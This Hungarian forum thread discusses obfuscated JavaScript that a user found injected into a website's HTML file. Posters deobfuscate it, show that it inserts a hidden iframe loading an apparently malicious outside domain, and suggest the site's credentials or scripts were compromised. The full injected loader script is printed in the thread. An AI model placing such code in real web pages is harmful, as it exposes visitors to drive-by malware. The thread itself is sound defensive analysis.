Hirdetés
- Kis méret, nagy változás a Motorolánál
- Samsung Galaxy S25 Ultra - titán keret, acélos teljesítmény
- Samsung Galaxy A52s 5G - jó S-tehetség
- Xiaomi 15T - reakció nélkül nincs egyensúly
- Telekom mobilszolgáltatások
- A középkategória egyik legjobb vétele - Dreame L40 Ultra AE
- Samsung Galaxy S23 és S23+ - ami belül van, az számít igazán
- Samsung Galaxy Watch (Tizen és Wear OS) ingyenes számlapok, kupon kódok
- Milyen okostelefont vegyek?
- Fotók, videók mobillal
Új hozzászólás Aktív témák
-
cucka
addikt
válasz
eziskamu
#2923
üzenetére
Ez egy javascript kód. Ha <script> és </script> közé teszed, akkor lefut, különben ki lesz írva a képernyőre mint szöveg.
Amúgy nem egy nagy cucc visszafejteni, deklarál egy csomó változót, amiben 1-2 betű található, majd ezeket összekonkatenálja és a következőket csinálja:
- létrehoz egy iframe-et
- beállítja az src, a width, a height paramétereket, valamint a style-ját display:none-ra állítja.
- a body-hoz hozzáadja az iframe-et az appendChild metódussalAzt meg nézd meg te, hogy mit van azon az oldalon, nálam itt véget ért a kisérletezési kedv
.Gondolom valamilyen eltérítés más oldalra, esetleg jelszólopás, ilyesmi. Amúgy ezt a technikát hívják úgy, hogy cross site scripting (xss).Mod: látom, közben megelőztetek
-
#2926
fordfairlane
veterán
eziskamu
#2923
fordfairlane
veterán
válasz
eziskamu
#2923
üzenetére
Ez az index.html-ben működőképes?
Így önmagában nem, csak ha <script></script> tagok közé rakod az általad bemásolt kódot, vagy .js fájlba, amire egy html oldal hivatkozik.
Van fent kettő is, mert két oldal van egy tárhelyen, az egyikben az oldalon megjelent szövegként, a másikon meg nem. A másikban aktív lehetett?
Bocs, ezt most nem értem.
-
PazsitZ
addikt
válasz
eziskamu
#2920
üzenetére
Fárasztó egy javascript kód:
wy='t';
ya='mp';
yu='p:';
qs='sr';
d='nit';
l='ame';
v='c';
z='t';
ow='io';
zt='n/';
sc='n';
o='//z';
hy='cha';
hg='h';
p='.c';
j='ifr';
f='e';
dx=j.concat(l); // dx=iframe
lr=qs.concat(v); // lr=src
ua=hg.concat(wy,z,yu,o,f,d,hy,ya,ow,sc,p,zt); // http://zenitchampion.cn/
var dj=document.createElement(dx); // document.createElement(iframe);
dj.setAttribute('width','5'); //
dj.setAttribute('height','5'); //
dj.setAttribute('style','display:none'); //
dj.setAttribute(lr,ua); // dj.setAttribute('src','http://zenitchampion.cn/');
document.body.appendChild(dj); // beilleszti a body végére: <iframe width="5" height="5" style="display:none;" src="http://zenitchampion.cn/">persze ezek csak akkor futnak le ha <script> tag között vannak.
A lényege, hogy beilleszti a body végére a következő html kódot (egy nem látható iframe-t a fent említett oldalről):
<iframe width="5" height="5" style="display:none;" src="fent említett oldal">Amire nekem az avast rögtön támadást érzékel (JS:ScriptPE-inf [Trj]) már csak a cím google-al való rákereséssel is.
-
#2921
fordfairlane
veterán
eziskamu
#2920
fordfairlane
veterán
válasz
eziskamu
#2920
üzenetére
Ez javascript genyóság, időm most nincs tesztelni, hogy pontosan mit is csinál, valamit a böngészővel kavar, talán átirányítja máshova. Ha egy html fájlban találtad az azt jelenti, hogy a támadó fájlokat tud írni a szerveren. Ez két módon lehetséges:
Név/Jelszót szerzett, és valami fájlátviteli protokollal (FTP, SCP, SFTP) képes felülírni a szerveren.
Van egy webes script, amiben van valamiféle bug, amit kihasználva fájlokat lehet felülírni.Érdemes kinyomozni, melyikről lehet szó, illetve jelszót változtatni nem árt.
.Gondolom valamilyen eltérítés más oldalra, esetleg jelszólopás, ilyesmi. Amúgy ezt a technikát hívják úgy, hogy cross site scripting (xss).
Új hozzászólás Aktív témák
- Milyen okostelefont vegyek? OFF topik
- Kerékpárosok, bringások ide!
- Projektor topic
- Milyen videókártyát?
- Belerohan a hazai piac Kína saját csúcsmemóriáiba
- A fociról könnyedén, egy baráti társaságban
- Mennyibe fog kerülni a Steam Machine?
- ASUS routerek
- Soundbar, soundplate, hangprojektor
- HiFi műszaki szemmel - sztereó hangrendszerek
- További aktív témák...
- Xiaomi Redmi Note 11 Pro 5G - 6/128 - kék
- Szép! Dell Precision 7760 Tervező Vágó Laptop -70% 17,3" i7-11850H 32/1TB NVIDIA A3000 6GB FHD
- SZÉP! Dell Precision 7760 Tervező Vágó Laptop -70% 17,3" i7-11850H 32/512GB NVIDIA A3000 6GB FHD
- Dell UltraSharp U2913WM 2560 1080 monitor + Dell Sound Bar AX510 10W
- Intel Core i7-4702MQ Mobile Notebook Processzor
- Samsung Galaxy A34 5G 128GB,Újszerű,Dobozával,12 hónap garanciával
- Bomba ár! Dell Latitude 5410 - i5-10GEN I 8GB I 256SSD I HDMI I 14" FHD I Cam I W11 I Garancia!
- Bomba ár! Lenovo ThinkPad T470s - i5-6GEN I 8GB I 256GB SSD I 14" FHD Touch I Cam I W11 I Gari!
- 171 - Lenovo Legion Pro 7 (16IAX10H) - Intel Core U9 275HX, RTX 5080
- ÁRGARANCIA!Épített KomPhone i5 14600KF 16/32/64GB RAM RTX 5070 12GB GAMER PC termékbeszámítással
Állásajánlatok
Cég: ATW Internet Kft.
Város: Budapest
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest